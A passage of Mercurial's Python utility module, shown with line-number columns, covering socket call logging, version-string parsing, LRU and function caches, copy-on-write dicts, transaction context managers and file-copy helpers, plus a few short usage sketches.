1011 1013 b'%s> recvfrom_into(%d, %d) -> %d'
1012 1014 % (self.name, size, flags, res[0])
1013 1015 )
1014 1016
1015 1017 self._writedata(buf[0 : res[0]])
1016 1018
1017 1019 def recv_into(self, res, buf, size=0, flags=0):
1018 1020 if not self.reads:
1019 1021 return
1020 1022
1021 1023 if self.logdataapis:
1022 1024 self.fh.write(
1023 1025 b'%s> recv_into(%d, %d) -> %d' % (self.name, size, flags, res)
1024 1026 )
1025 1027
1026 1028 self._writedata(buf[0:res])
1027 1029
1028 1030 def send(self, res, data, flags=0):
1029 1031 if not self.writes:
1030 1032 return
1031 1033
1032 1034 self.fh.write(
1033 1035 b'%s> send(%d, %d) -> %d' % (self.name, len(data), flags, len(res))
1034 1036 )
1035 1037 self._writedata(data)
1036 1038
1037 1039 def sendall(self, res, data, flags=0):
1038 1040 if not self.writes:
1039 1041 return
1040 1042
1041 1043 if self.logdataapis:
1042 1044 # Returns None on success. So don't bother reporting return value.
1043 1045 self.fh.write(
1044 1046 b'%s> sendall(%d, %d)' % (self.name, len(data), flags)
1045 1047 )
1046 1048
1047 1049 self._writedata(data)
1048 1050
1049 1051 def sendto(self, res, data, flagsoraddress, address=None):
1050 1052 if not self.writes:
1051 1053 return
1052 1054
1053 1055 if address:
1054 1056 flags = flagsoraddress
1055 1057 else:
1056 1058 flags = 0
1057 1059
1058 1060 if self.logdataapis:
1059 1061 self.fh.write(
1060 1062 b'%s> sendto(%d, %d, %r) -> %d'
1061 1063 % (self.name, len(data), flags, address, res)
1062 1064 )
1063 1065
1064 1066 self._writedata(data)
1065 1067
1066 1068 def setblocking(self, res, flag):
1067 1069 if not self.states:
1068 1070 return
1069 1071
1070 1072 self.fh.write(b'%s> setblocking(%r)\n' % (self.name, flag))
1071 1073
1072 1074 def settimeout(self, res, value):
1073 1075 if not self.states:
1074 1076 return
1075 1077
1076 1078 self.fh.write(b'%s> settimeout(%r)\n' % (self.name, value))
1077 1079
1078 1080 def gettimeout(self, res):
1079 1081 if not self.states:
1080 1082 return
1081 1083
1082 1084 self.fh.write(b'%s> gettimeout() -> %f\n' % (self.name, res))
1083 1085
1084 1086 def setsockopt(self, res, level, optname, value):
1085 1087 if not self.states:
1086 1088 return
1087 1089
1088 1090 self.fh.write(
1089 1091 b'%s> setsockopt(%r, %r, %r) -> %r\n'
1090 1092 % (self.name, level, optname, value, res)
1091 1093 )
1092 1094
1093 1095
1094 1096 def makeloggingsocket(
1095 1097 logh,
1096 1098 fh,
1097 1099 name,
1098 1100 reads=True,
1099 1101 writes=True,
1100 1102 states=True,
1101 1103 logdata=False,
1102 1104 logdataapis=True,
1103 1105 ):
1104 1106 """Turn a socket into a logging socket."""
1105 1107
1106 1108 observer = socketobserver(
1107 1109 logh,
1108 1110 name,
1109 1111 reads=reads,
1110 1112 writes=writes,
1111 1113 states=states,
1112 1114 logdata=logdata,
1113 1115 logdataapis=logdataapis,
1114 1116 )
1115 1117 return socketproxy(fh, observer)
1116 1118
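# The socket variant follows the same pattern (names are illustrative):
def _demologgingsocket(logfh, sock):
    proxied = makeloggingsocket(logfh, sock, b'conn', logdata=True)
    proxied.sendall(b'ping')  # logged as roughly b'conn> sendall(4, 0): ping'
    return proxied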
1117 1119
1118 1120 def version():
1119 1121 """Return version information if available."""
1120 1122 try:
1121 1123 from . import __version__
1122 1124
1123 1125 return __version__.version
1124 1126 except ImportError:
1125 1127 return b'unknown'
1126 1128
1127 1129
1128 1130 def versiontuple(v=None, n=4):
1129 1131 """Parses a Mercurial version string into an N-tuple.
1130 1132
1131 1133 The version string to be parsed is specified with the ``v`` argument.
1132 1134 If it isn't defined, the current Mercurial version string will be parsed.
1133 1135
1134 1136 ``n`` can be 2, 3, or 4. Here is how some version strings map to
1135 1137 returned values:
1136 1138
1137 1139 >>> v = b'3.6.1+190-df9b73d2d444'
1138 1140 >>> versiontuple(v, 2)
1139 1141 (3, 6)
1140 1142 >>> versiontuple(v, 3)
1141 1143 (3, 6, 1)
1142 1144 >>> versiontuple(v, 4)
1143 1145 (3, 6, 1, '190-df9b73d2d444')
1144 1146
1145 1147 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
1146 1148 (3, 6, 1, '190-df9b73d2d444+20151118')
1147 1149
1148 1150 >>> v = b'3.6'
1149 1151 >>> versiontuple(v, 2)
1150 1152 (3, 6)
1151 1153 >>> versiontuple(v, 3)
1152 1154 (3, 6, None)
1153 1155 >>> versiontuple(v, 4)
1154 1156 (3, 6, None, None)
1155 1157
1156 1158 >>> v = b'3.9-rc'
1157 1159 >>> versiontuple(v, 2)
1158 1160 (3, 9)
1159 1161 >>> versiontuple(v, 3)
1160 1162 (3, 9, None)
1161 1163 >>> versiontuple(v, 4)
1162 1164 (3, 9, None, 'rc')
1163 1165
1164 1166 >>> v = b'3.9-rc+2-02a8fea4289b'
1165 1167 >>> versiontuple(v, 2)
1166 1168 (3, 9)
1167 1169 >>> versiontuple(v, 3)
1168 1170 (3, 9, None)
1169 1171 >>> versiontuple(v, 4)
1170 1172 (3, 9, None, 'rc+2-02a8fea4289b')
1171 1173
1172 1174 >>> versiontuple(b'4.6rc0')
1173 1175 (4, 6, None, 'rc0')
1174 1176 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1175 1177 (4, 6, None, 'rc0+12-425d55e54f98')
1176 1178 >>> versiontuple(b'.1.2.3')
1177 1179 (None, None, None, '.1.2.3')
1178 1180 >>> versiontuple(b'12.34..5')
1179 1181 (12, 34, None, '..5')
1180 1182 >>> versiontuple(b'1.2.3.4.5.6')
1181 1183 (1, 2, 3, '.4.5.6')
1182 1184 """
1183 1185 if not v:
1184 1186 v = version()
1185 1187 m = remod.match(br'(\d+(?:\.\d+){,2})[+-]?(.*)', v)
1186 1188 if not m:
1187 1189 vparts, extra = b'', v
1188 1190 elif m.group(2):
1189 1191 vparts, extra = m.groups()
1190 1192 else:
1191 1193 vparts, extra = m.group(1), None
1192 1194
1193 1195 assert vparts is not None # help pytype
1194 1196
1195 1197 vints = []
1196 1198 for i in vparts.split(b'.'):
1197 1199 try:
1198 1200 vints.append(int(i))
1199 1201 except ValueError:
1200 1202 break
1201 1203 # (3, 6) -> (3, 6, None)
1202 1204 while len(vints) < 3:
1203 1205 vints.append(None)
1204 1206
1205 1207 if n == 2:
1206 1208 return (vints[0], vints[1])
1207 1209 if n == 3:
1208 1210 return (vints[0], vints[1], vints[2])
1209 1211 if n == 4:
1210 1212 return (vints[0], vints[1], vints[2], extra)
1211 1213
1212 1214
1213 1215 def cachefunc(func):
1214 1216 '''cache the result of function calls'''
1215 1217 # XXX doesn't handle keyword args
1216 1218 if func.__code__.co_argcount == 0:
1217 1219 listcache = []
1218 1220
1219 1221 def f():
1220 1222 if len(listcache) == 0:
1221 1223 listcache.append(func())
1222 1224 return listcache[0]
1223 1225
1224 1226 return f
1225 1227 cache = {}
1226 1228 if func.__code__.co_argcount == 1:
1227 1229 # we gain a small amount of time because
1228 1230 # we don't need to pack/unpack the list
1229 1231 def f(arg):
1230 1232 if arg not in cache:
1231 1233 cache[arg] = func(arg)
1232 1234 return cache[arg]
1233 1235
1234 1236 else:
1235 1237
1236 1238 def f(*args):
1237 1239 if args not in cache:
1238 1240 cache[args] = func(*args)
1239 1241 return cache[args]
1240 1242
1241 1243 return f
1242 1244
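# Usage sketch (the decorated function is hypothetical): results are keyed
# on positional arguments only, per the XXX above.
@cachefunc
def _demosquare(x):
    return x * x  # computed once per distinct x, then served from the cache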
1243 1245
1244 1246 class cow(object):
1245 1247 """helper class to make copy-on-write easier
1246 1248
1247 1249 Call preparewrite before doing any writes.
1248 1250 """
1249 1251
1250 1252 def preparewrite(self):
1251 1253 """call this before writes, return self or a copied new object"""
1252 1254 if getattr(self, '_copied', 0):
1253 1255 self._copied -= 1
1254 1256 return self.__class__(self)
1255 1257 return self
1256 1258
1257 1259 def copy(self):
1258 1260 """always do a cheap copy"""
1259 1261 self._copied = getattr(self, '_copied', 0) + 1
1260 1262 return self
1261 1263
1262 1264
1263 1265 class sortdict(collections.OrderedDict):
1264 1266 '''a simple sorted dictionary
1265 1267
1266 1268 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1267 1269 >>> d2 = d1.copy()
1268 1270 >>> d2
1269 1271 sortdict([('a', 0), ('b', 1)])
1270 1272 >>> d2.update([(b'a', 2)])
1271 1273 >>> list(d2.keys()) # should still be in last-set order
1272 1274 ['b', 'a']
1273 1275 >>> d1.insert(1, b'a.5', 0.5)
1274 1276 >>> d1
1275 1277 sortdict([('a', 0), ('a.5', 0.5), ('b', 1)])
1276 1278 '''
1277 1279
1278 1280 def __setitem__(self, key, value):
1279 1281 if key in self:
1280 1282 del self[key]
1281 1283 super(sortdict, self).__setitem__(key, value)
1282 1284
1283 1285 if pycompat.ispypy:
1284 1286 # __setitem__() isn't called as of PyPy 5.8.0
1285 1287 def update(self, src):
1286 1288 if isinstance(src, dict):
1287 1289 src = pycompat.iteritems(src)
1288 1290 for k, v in src:
1289 1291 self[k] = v
1290 1292
1291 1293 def insert(self, position, key, value):
1292 1294 for (i, (k, v)) in enumerate(list(self.items())):
1293 1295 if i == position:
1294 1296 self[key] = value
1295 1297 if i >= position:
1296 1298 del self[k]
1297 1299 self[k] = v
1298 1300
1299 1301
1300 1302 class cowdict(cow, dict):
1301 1303 """copy-on-write dict
1302 1304
1303 1305 Be sure to call d = d.preparewrite() before writing to d.
1304 1306
1305 1307 >>> a = cowdict()
1306 1308 >>> a is a.preparewrite()
1307 1309 True
1308 1310 >>> b = a.copy()
1309 1311 >>> b is a
1310 1312 True
1311 1313 >>> c = b.copy()
1312 1314 >>> c is a
1313 1315 True
1314 1316 >>> a = a.preparewrite()
1315 1317 >>> b is a
1316 1318 False
1317 1319 >>> a is a.preparewrite()
1318 1320 True
1319 1321 >>> c = c.preparewrite()
1320 1322 >>> b is c
1321 1323 False
1322 1324 >>> b is b.preparewrite()
1323 1325 True
1324 1326 """
1325 1327
1326 1328
1327 1329 class cowsortdict(cow, sortdict):
1328 1330 """copy-on-write sortdict
1329 1331
1330 1332 Be sure to call d = d.preparewrite() before writing to d.
1331 1333 """
1332 1334
1333 1335
1334 1336 class transactional(object): # pytype: disable=ignored-metaclass
1335 1337 """Base class for making a transactional type into a context manager."""
1336 1338
1337 1339 __metaclass__ = abc.ABCMeta
1338 1340
1339 1341 @abc.abstractmethod
1340 1342 def close(self):
1341 1343 """Successfully closes the transaction."""
1342 1344
1343 1345 @abc.abstractmethod
1344 1346 def release(self):
1345 1347 """Marks the end of the transaction.
1346 1348
1347 1349 If the transaction has not been closed, it will be aborted.
1348 1350 """
1349 1351
1350 1352 def __enter__(self):
1351 1353 return self
1352 1354
1353 1355 def __exit__(self, exc_type, exc_val, exc_tb):
1354 1356 try:
1355 1357 if exc_type is None:
1356 1358 self.close()
1357 1359 finally:
1358 1360 self.release()
1359 1361
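# Sketch of a minimal concrete subclass (hypothetical): used as a context
# manager, close() runs only on a clean exit while release() always runs.
class _demotransaction(transactional):
    def close(self):
        pass  # commit the work here

    def release(self):
        pass  # abort here if close() was never called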
1360 1362
1361 1363 @contextlib.contextmanager
1362 1364 def acceptintervention(tr=None):
1363 1365 """A context manager that closes the transaction on InterventionRequired
1364 1366
1365 1367 If no transaction was provided, this simply runs the body and returns
1366 1368 """
1367 1369 if not tr:
1368 1370 yield
1369 1371 return
1370 1372 try:
1371 1373 yield
1372 1374 tr.close()
1373 1375 except error.InterventionRequired:
1374 1376 tr.close()
1375 1377 raise
1376 1378 finally:
1377 1379 tr.release()
1378 1380
1379 1381
1380 1382 @contextlib.contextmanager
1381 1383 def nullcontextmanager():
1382 1384 yield
1383 1385
1384 1386
1385 1387 class _lrucachenode(object):
1386 1388 """A node in a doubly linked list.
1387 1389
1388 1390 Holds a reference to nodes on either side as well as a key-value
1389 1391 pair for the dictionary entry.
1390 1392 """
1391 1393
1392 1394 __slots__ = ('next', 'prev', 'key', 'value', 'cost')
1393 1395
1394 1396 def __init__(self):
1395 1397 self.next = None
1396 1398 self.prev = None
1397 1399
1398 1400 self.key = _notset
1399 1401 self.value = None
1400 1402 self.cost = 0
1401 1403
1402 1404 def markempty(self):
1403 1405 """Mark the node as emptied."""
1404 1406 self.key = _notset
1405 1407 self.value = None
1406 1408 self.cost = 0
1407 1409
1408 1410
1409 1411 class lrucachedict(object):
1410 1412 """Dict that caches most recent accesses and sets.
1411 1413
1412 1414 The dict consists of an actual backing dict - indexed by original
1413 1415 key - and a doubly linked circular list defining the order of entries in
1414 1416 the cache.
1415 1417
1416 1418 The head node is the newest entry in the cache. If the cache is full,
1417 1419 we recycle head.prev and make it the new head. Cache accesses result in
1418 1420 the node being moved to before the existing head and being marked as the
1419 1421 new head node.
1420 1422
1421 1423 Items in the cache can be inserted with an optional "cost" value. This is
1422 1424 simply an integer that is specified by the caller. The cache can be queried
1423 1425 for the total cost of all items presently in the cache.
1424 1426
1425 1427 The cache can also define a maximum cost. If a cache insertion would
1426 1428 cause the total cost of the cache to go beyond the maximum cost limit,
1427 1429 nodes will be evicted to make room for the new node. This can be used
1428 1430 to e.g. set a max memory limit and associate an estimated bytes size
1429 1431 cost to each item in the cache. By default, no maximum cost is enforced.
1430 1432 """
1431 1433
1432 1434 def __init__(self, max, maxcost=0):
1433 1435 self._cache = {}
1434 1436
1435 1437 self._head = head = _lrucachenode()
1436 1438 head.prev = head
1437 1439 head.next = head
1438 1440 self._size = 1
1439 1441 self.capacity = max
1440 1442 self.totalcost = 0
1441 1443 self.maxcost = maxcost
1442 1444
1443 1445 def __len__(self):
1444 1446 return len(self._cache)
1445 1447
1446 1448 def __contains__(self, k):
1447 1449 return k in self._cache
1448 1450
1449 1451 def __iter__(self):
1450 1452 # We don't have to iterate in cache order, but why not.
1451 1453 n = self._head
1452 1454 for i in range(len(self._cache)):
1453 1455 yield n.key
1454 1456 n = n.next
1455 1457
1456 1458 def __getitem__(self, k):
1457 1459 node = self._cache[k]
1458 1460 self._movetohead(node)
1459 1461 return node.value
1460 1462
1461 1463 def insert(self, k, v, cost=0):
1462 1464 """Insert a new item in the cache with optional cost value."""
1463 1465 node = self._cache.get(k)
1464 1466 # Replace existing value and mark as newest.
1465 1467 if node is not None:
1466 1468 self.totalcost -= node.cost
1467 1469 node.value = v
1468 1470 node.cost = cost
1469 1471 self.totalcost += cost
1470 1472 self._movetohead(node)
1471 1473
1472 1474 if self.maxcost:
1473 1475 self._enforcecostlimit()
1474 1476
1475 1477 return
1476 1478
1477 1479 if self._size < self.capacity:
1478 1480 node = self._addcapacity()
1479 1481 else:
1480 1482 # Grab the last/oldest item.
1481 1483 node = self._head.prev
1482 1484
1483 1485 # At capacity. Kill the old entry.
1484 1486 if node.key is not _notset:
1485 1487 self.totalcost -= node.cost
1486 1488 del self._cache[node.key]
1487 1489
1488 1490 node.key = k
1489 1491 node.value = v
1490 1492 node.cost = cost
1491 1493 self.totalcost += cost
1492 1494 self._cache[k] = node
1493 1495 # And mark it as newest entry. No need to adjust order since it
1494 1496 # is already self._head.prev.
1495 1497 self._head = node
1496 1498
1497 1499 if self.maxcost:
1498 1500 self._enforcecostlimit()
1499 1501
1500 1502 def __setitem__(self, k, v):
1501 1503 self.insert(k, v)
1502 1504
1503 1505 def __delitem__(self, k):
1504 1506 self.pop(k)
1505 1507
1506 1508 def pop(self, k, default=_notset):
1507 1509 try:
1508 1510 node = self._cache.pop(k)
1509 1511 except KeyError:
1510 1512 if default is _notset:
1511 1513 raise
1512 1514 return default
1513 1515
1514 1516 assert node is not None # help pytype
1515 1517 value = node.value
1516 1518 self.totalcost -= node.cost
1517 1519 node.markempty()
1518 1520
1519 1521 # Temporarily mark as newest item before re-adjusting head to make
1520 1522 # this node the oldest item.
1521 1523 self._movetohead(node)
1522 1524 self._head = node.next
1523 1525
1524 1526 return value
1525 1527
1526 1528 # Additional dict methods.
1527 1529
1528 1530 def get(self, k, default=None):
1529 1531 try:
1530 1532 return self.__getitem__(k)
1531 1533 except KeyError:
1532 1534 return default
1533 1535
1534 1536 def peek(self, k, default=_notset):
1535 1537 """Get the specified item without moving it to the head
1536 1538
1537 1539 Unlike get(), this doesn't mutate the internal state. But be aware
1538 1540 that it doesn't mean peek() is thread safe.
1539 1541 """
1540 1542 try:
1541 1543 node = self._cache[k]
1542 1544 return node.value
1543 1545 except KeyError:
1544 1546 if default is _notset:
1545 1547 raise
1546 1548 return default
1547 1549
1548 1550 def clear(self):
1549 1551 n = self._head
1550 1552 while n.key is not _notset:
1551 1553 self.totalcost -= n.cost
1552 1554 n.markempty()
1553 1555 n = n.next
1554 1556
1555 1557 self._cache.clear()
1556 1558
1557 1559 def copy(self, capacity=None, maxcost=0):
1558 1560 """Create a new cache as a copy of the current one.
1559 1561
1560 1562 By default, the new cache has the same capacity as the existing one.
1561 1563 But, the cache capacity can be changed as part of performing the
1562 1564 copy.
1563 1565
1564 1566 Items in the copy have an insertion/access order matching this
1565 1567 instance.
1566 1568 """
1567 1569
1568 1570 capacity = capacity or self.capacity
1569 1571 maxcost = maxcost or self.maxcost
1570 1572 result = lrucachedict(capacity, maxcost=maxcost)
1571 1573
1572 1574 # We copy entries by iterating in oldest-to-newest order so the copy
1573 1575 # has the correct ordering.
1574 1576
1575 1577 # Find the first non-empty entry.
1576 1578 n = self._head.prev
1577 1579 while n.key is _notset and n is not self._head:
1578 1580 n = n.prev
1579 1581
1580 1582 # We could potentially skip the first N items when decreasing capacity.
1581 1583 # But let's keep it simple unless it is a performance problem.
1582 1584 for i in range(len(self._cache)):
1583 1585 result.insert(n.key, n.value, cost=n.cost)
1584 1586 n = n.prev
1585 1587
1586 1588 return result
1587 1589
1588 1590 def popoldest(self):
1589 1591 """Remove the oldest item from the cache.
1590 1592
1591 1593 Returns the (key, value) describing the removed cache entry.
1592 1594 """
1593 1595 if not self._cache:
1594 1596 return
1595 1597
1596 1598 # Walk the linked list backwards starting at tail node until we hit
1597 1599 # a non-empty node.
1598 1600 n = self._head.prev
1599 1601 while n.key is _notset:
1600 1602 n = n.prev
1601 1603
1602 1604 assert n is not None # help pytype
1603 1605
1604 1606 key, value = n.key, n.value
1605 1607
1606 1608 # And remove it from the cache and mark it as empty.
1607 1609 del self._cache[n.key]
1608 1610 self.totalcost -= n.cost
1609 1611 n.markempty()
1610 1612
1611 1613 return key, value
1612 1614
1613 1615 def _movetohead(self, node):
1614 1616 """Mark a node as the newest, making it the new head.
1615 1617
1616 1618 When a node is accessed, it becomes the freshest entry in the LRU
1617 1619 list, which is denoted by self._head.
1618 1620
1619 1621 Visually, let's make ``N`` the new head node (* denotes head):
1620 1622
1621 1623 previous/oldest <-> head <-> next/next newest
1622 1624
1623 1625 ----<->--- A* ---<->-----
1624 1626 | |
1625 1627 E <-> D <-> N <-> C <-> B
1626 1628
1627 1629 To:
1628 1630
1629 1631 ----<->--- N* ---<->-----
1630 1632 | |
1631 1633 E <-> D <-> C <-> B <-> A
1632 1634
1633 1635 This requires the following moves:
1634 1636
1635 1637 C.next = D (node.prev.next = node.next)
1636 1638 D.prev = C (node.next.prev = node.prev)
1637 1639 E.next = N (head.prev.next = node)
1638 1640 N.prev = E (node.prev = head.prev)
1639 1641 N.next = A (node.next = head)
1640 1642 A.prev = N (head.prev = node)
1641 1643 """
1642 1644 head = self._head
1643 1645 # C.next = D
1644 1646 node.prev.next = node.next
1645 1647 # D.prev = C
1646 1648 node.next.prev = node.prev
1647 1649 # N.prev = E
1648 1650 node.prev = head.prev
1649 1651 # N.next = A
1650 1652 # It is tempting to do just "head" here, however if node is
1651 1653 # adjacent to head, this will do bad things.
1652 1654 node.next = head.prev.next
1653 1655 # E.next = N
1654 1656 node.next.prev = node
1655 1657 # A.prev = N
1656 1658 node.prev.next = node
1657 1659
1658 1660 self._head = node
1659 1661
1660 1662 def _addcapacity(self):
1661 1663 """Add a node to the circular linked list.
1662 1664
1663 1665 The new node is inserted before the head node.
1664 1666 """
1665 1667 head = self._head
1666 1668 node = _lrucachenode()
1667 1669 head.prev.next = node
1668 1670 node.prev = head.prev
1669 1671 node.next = head
1670 1672 head.prev = node
1671 1673 self._size += 1
1672 1674 return node
1673 1675
1674 1676 def _enforcecostlimit(self):
1675 1677 # This should run after an insertion. It should only be called if total
1676 1678 # cost limits are being enforced.
1677 1679 # The most recently inserted node is never evicted.
1678 1680 if len(self) <= 1 or self.totalcost <= self.maxcost:
1679 1681 return
1680 1682
1681 1683 # This is logically equivalent to calling popoldest() until we
1682 1684 # free up enough cost. We don't do that since popoldest() needs
1683 1685 # to walk the linked list and doing this in a loop would be
1684 1686 # quadratic. So we find the first non-empty node and then
1685 1687 # walk nodes until we free up enough capacity.
1686 1688 #
1687 1689 # If we only removed the minimum number of nodes to free enough
1688 1690 # cost at insert time, chances are high that the next insert would
1689 1691 # also require pruning. This would effectively constitute quadratic
1690 1692 # behavior for insert-heavy workloads. To mitigate this, we set a
1691 1693 # target cost that is a percentage of the max cost. This will tend
1692 1694 # to free more nodes when the high water mark is reached, which
1693 1695 # lowers the chances of needing to prune on the subsequent insert.
1694 1696 targetcost = int(self.maxcost * 0.75)
1695 1697
1696 1698 n = self._head.prev
1697 1699 while n.key is _notset:
1698 1700 n = n.prev
1699 1701
1700 1702 while len(self) > 1 and self.totalcost > targetcost:
1701 1703 del self._cache[n.key]
1702 1704 self.totalcost -= n.cost
1703 1705 n.markempty()
1704 1706 n = n.prev
1705 1707
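# Sketch of the cost-limited mode (the numbers are illustrative):
def _demolrucost():
    d = lrucachedict(4, maxcost=100)
    d.insert(b'a', b'vala', cost=60)
    d.insert(b'b', b'valb', cost=60)  # total cost 120 > 100: b'a' is evicted
    return b'a' in d, b'b' in d       # (False, True)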
1706 1708
1707 1709 def lrucachefunc(func):
1708 1710 '''cache most recent results of function calls'''
1709 1711 cache = {}
1710 1712 order = collections.deque()
1711 1713 if func.__code__.co_argcount == 1:
1712 1714
1713 1715 def f(arg):
1714 1716 if arg not in cache:
1715 1717 if len(cache) > 20:
1716 1718 del cache[order.popleft()]
1717 1719 cache[arg] = func(arg)
1718 1720 else:
1719 1721 order.remove(arg)
1720 1722 order.append(arg)
1721 1723 return cache[arg]
1722 1724
1723 1725 else:
1724 1726
1725 1727 def f(*args):
1726 1728 if args not in cache:
1727 1729 if len(cache) > 20:
1728 1730 del cache[order.popleft()]
1729 1731 cache[args] = func(*args)
1730 1732 else:
1731 1733 order.remove(args)
1732 1734 order.append(args)
1733 1735 return cache[args]
1734 1736
1735 1737 return f
1736 1738
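# Like cachefunc, but bounded: only the results for the most recently used
# arguments are kept (sketch; the decorated function is hypothetical):
@lrucachefunc
def _demoupper(arg):
    return arg.upper()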
1737 1739
1738 1740 class propertycache(object):
1739 1741 def __init__(self, func):
1740 1742 self.func = func
1741 1743 self.name = func.__name__
1742 1744
1743 1745 def __get__(self, obj, type=None):
1744 1746 result = self.func(obj)
1745 1747 self.cachevalue(obj, result)
1746 1748 return result
1747 1749
1748 1750 def cachevalue(self, obj, value):
1749 1751 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1750 1752 obj.__dict__[self.name] = value
1751 1753
1752 1754
1753 1755 def clearcachedproperty(obj, prop):
1754 1756 '''clear a cached property value, if one has been set'''
1755 1757 prop = pycompat.sysstr(prop)
1756 1758 if prop in obj.__dict__:
1757 1759 del obj.__dict__[prop]
1758 1760
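# Sketch: the first access stores the computed value in the instance
# __dict__, bypassing the descriptor on later reads, and
# clearcachedproperty() removes it again (the class is hypothetical).
class _demoprops(object):
    @propertycache
    def answer(self):
        return 42  # runs once; clearcachedproperty(obj, b'answer') resets it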
1759 1761
1760 1762 def increasingchunks(source, min=1024, max=65536):
1761 1763 '''return no less than min bytes per chunk while data remains,
1762 1764 doubling min after each chunk until it reaches max'''
1763 1765
1764 1766 def log2(x):
1765 1767 if not x:
1766 1768 return 0
1767 1769 i = 0
1768 1770 while x:
1769 1771 x >>= 1
1770 1772 i += 1
1771 1773 return i - 1
1772 1774
1773 1775 buf = []
1774 1776 blen = 0
1775 1777 for chunk in source:
1776 1778 buf.append(chunk)
1777 1779 blen += len(chunk)
1778 1780 if blen >= min:
1779 1781 if min < max:
1780 1782 min = min << 1
1781 1783 nmin = 1 << log2(blen)
1782 1784 if nmin > min:
1783 1785 min = nmin
1784 1786 if min > max:
1785 1787 min = max
1786 1788 yield b''.join(buf)
1787 1789 blen = 0
1788 1790 buf = []
1789 1791 if buf:
1790 1792 yield b''.join(buf)
1791 1793
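# Sketch of the growth pattern (sizes are illustrative): many small input
# chunks come out as progressively larger ones, roughly 1k, 2k, 4k, ...
# capped at 64k.
def _demoincreasingchunks():
    source = (b'x' * 512 for _ in range(512))
    return [len(c) for c in increasingchunks(source)]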
1792 1794
1793 1795 def always(fn):
1794 1796 return True
1795 1797
1796 1798
1797 1799 def never(fn):
1798 1800 return False
1799 1801
1800 1802
1801 1803 def nogc(func):
1802 1804 """disable garbage collector
1803 1805
1804 1806 Python's garbage collector triggers a GC each time a certain number of
1805 1807 container objects (the number being defined by gc.get_threshold()) are
1806 1808 allocated even when marked not to be tracked by the collector. Tracking has
1807 1809 no effect on when GCs are triggered, only on what objects the GC looks
1808 1810 into. As a workaround, disable GC while building complex (huge)
1809 1811 containers.
1810 1812
1811 1813 This garbage collector issue has been fixed in 2.7, but it still affects
1812 1814 CPython's performance.
1813 1815 """
1814 1816
1815 1817 def wrapper(*args, **kwargs):
1816 1818 gcenabled = gc.isenabled()
1817 1819 gc.disable()
1818 1820 try:
1819 1821 return func(*args, **kwargs)
1820 1822 finally:
1821 1823 if gcenabled:
1822 1824 gc.enable()
1823 1825
1824 1826 return wrapper
1825 1827
1826 1828
1827 1829 if pycompat.ispypy:
1828 1830 # PyPy runs slower with gc disabled
1829 1831 nogc = lambda x: x
1830 1832
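# Usage sketch (the builder below is hypothetical): wrap code that
# allocates many container objects to avoid repeated GC passes on CPython.
@nogc
def _demobuildmap(items):
    return {k: v for k, v in items}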
1831 1833
1832 1834 def pathto(root, n1, n2):
1833 1835 '''return the relative path from one place to another.
1834 1836 root should use os.sep to separate directories
1835 1837 n1 should use os.sep to separate directories
1836 1838 n2 should use "/" to separate directories
1837 1839 returns an os.sep-separated path.
1838 1840
1839 1841 If n1 is a relative path, it is assumed to be
1840 1842 relative to root.
1841 1843 n2 should always be relative to root.
1842 1844 '''
1843 1845 if not n1:
1844 1846 return localpath(n2)
1845 1847 if os.path.isabs(n1):
1846 1848 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1847 1849 return os.path.join(root, localpath(n2))
1848 1850 n2 = b'/'.join((pconvert(root), n2))
1849 1851 a, b = splitpath(n1), n2.split(b'/')
1850 1852 a.reverse()
1851 1853 b.reverse()
1852 1854 while a and b and a[-1] == b[-1]:
1853 1855 a.pop()
1854 1856 b.pop()
1855 1857 b.reverse()
1856 1858 return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'
1857 1859
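# Worked examples (illustrative, POSIX separators assumed): the common
# leading components are stripped and replaced by the matching number of
# '..' entries.
#
#     pathto(b'/repo', b'a/b', b'a/c')   ->  b'../c'
#     pathto(b'/repo', b'a/b', b'c/d')   ->  b'../../c/d'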
1858 1860
1859 1861 def checksignature(func, depth=1):
1860 1862 '''wrap a function with code to check for calling errors'''
1861 1863
1862 1864 def check(*args, **kwargs):
1863 1865 try:
1864 1866 return func(*args, **kwargs)
1865 1867 except TypeError:
1866 1868 if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
1867 1869 raise error.SignatureError
1868 1870 raise
1869 1871
1870 1872 return check
1871 1873
1872 1874
1873 1875 # a whitelist of known filesystems where hardlinks work reliably
1874 1876 _hardlinkfswhitelist = {
1875 1877 b'apfs',
1876 1878 b'btrfs',
1877 1879 b'ext2',
1878 1880 b'ext3',
1879 1881 b'ext4',
1880 1882 b'hfs',
1881 1883 b'jfs',
1882 1884 b'NTFS',
1883 1885 b'reiserfs',
1884 1886 b'tmpfs',
1885 1887 b'ufs',
1886 1888 b'xfs',
1887 1889 b'zfs',
1888 1890 }
1889 1891
1890 1892
1891 1893 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1892 1894 '''copy a file, preserving mode and optionally other stat info like
1893 1895 atime/mtime
1894 1896
1895 1897 checkambig argument is used with filestat, and is useful only if
1896 1898 destination file is guarded by any lock (e.g. repo.lock or
1897 1899 repo.wlock).
1898 1900
1899 1901 copystat and checkambig should be exclusive.
1900 1902 '''
1901 1903 assert not (copystat and checkambig)
1902 1904 oldstat = None
1903 1905 if os.path.lexists(dest):
1904 1906 if checkambig:
1905 1907 oldstat = filestat.frompath(dest)
1906 1908 unlink(dest)
1907 1909 if hardlink:
1908 1910 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1909 1911 # unless we are confident that dest is on a whitelisted filesystem.
1910 1912 try:
1911 1913 fstype = getfstype(os.path.dirname(dest))
1912 1914 except OSError:
1913 1915 fstype = None
1914 1916 if fstype not in _hardlinkfswhitelist:
1915 1917 hardlink = False
1916 1918 if hardlink:
1917 1919 try:
1918 1920 oslink(src, dest)
1919 1921 return
1920 1922 except (IOError, OSError):
1921 1923 pass # fall back to normal copy
1922 1924 if os.path.islink(src):
1923 1925 os.symlink(os.readlink(src), dest)
1924 1926 # copytime is ignored for symlinks, but in general copytime isn't needed
1925 1927 # for them anyway
1926 1928 else:
1927 1929 try:
1928 1930 shutil.copyfile(src, dest)
1929 1931 if copystat:
1930 1932 # copystat also copies mode
1931 1933 shutil.copystat(src, dest)
1932 1934 else:
1933 1935 shutil.copymode(src, dest)
1934 1936 if oldstat and oldstat.stat:
1935 1937 newstat = filestat.frompath(dest)
1936 1938 if newstat.isambig(oldstat):
1937 1939 # stat of copied file is ambiguous to original one
1938 1940 advanced = (
